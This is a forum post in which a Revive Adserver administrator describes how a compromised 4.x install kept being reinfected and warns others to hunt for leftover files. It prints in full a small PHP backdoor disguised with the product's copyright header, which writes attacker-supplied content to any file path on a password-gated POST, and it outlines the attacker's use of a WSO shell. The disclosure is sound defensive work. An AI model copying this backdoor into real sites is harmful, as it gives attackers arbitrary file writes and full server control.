Jump to content
Thierry

Backdoor left by hackers after previous 4.x install has been highjacked...

Recommended Posts

My previous 4.x install got compromised, some of my users were complaining about malware alert and/or unwanted advertising (it was not all the time nor on all platform, making the issue difficult to pinpoint).

I thought cleaning the Revive DB and upgrading my Revive install would be enough to secure my site but sadly no, PREPEND payloads kept being added from time to time despite running the latest version of Revive.

It took some hunting but I eventually discovered the hacker left a tiny PHP file in my Revive www/images directory. As I'm keeping that directory during upgrades, the security hole remained.

The file was simple :

----

<?php

/*
+---------------------------------------------------------------------------+
| Revive Adserver                                                           |
| http://www.revive-adserver.com |
|                                                                           |
| Copyright: See the COPYRIGHT.txt file.                                    |
| License: GPLv2 or later, see the LICENSE.txt file.                        |
+---------------------------------------------------------------------------+
*/

if(isset($_POST['adSelect']) && md5($_POST['adSelect']) == '***MD5HASH***') {

@file_put_contents($_POST['banner_path'], $_POST['banner_contents']);

}

----

This allowed the hacker to load and execute any kind of files/scripts on my server!!!!

Lately he/she was uploading a "1.php" file (containing as I found out a WSO shell) which he/she would connect to, in order to load PREPEND payload to my Revive DB... He would use a different IP to create the 1.php and connect to it (trying to hide its trace). The file would be erased once he/she had done her "job".

The process looks fairly manual.

Of course the hacker may well have left other backdoors outside of my Revive install 😞 😞 😞 This makes it impossible to guarantee all issues are resolved after an upgrade (may be a quick check for PREPEND payload and/or PHP files in the www/images directory could offer an alert that something is fishy...).

I would strongly recommend anyone who's had a 4.x install compromised to hunt for such files.

Cheers,

T.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...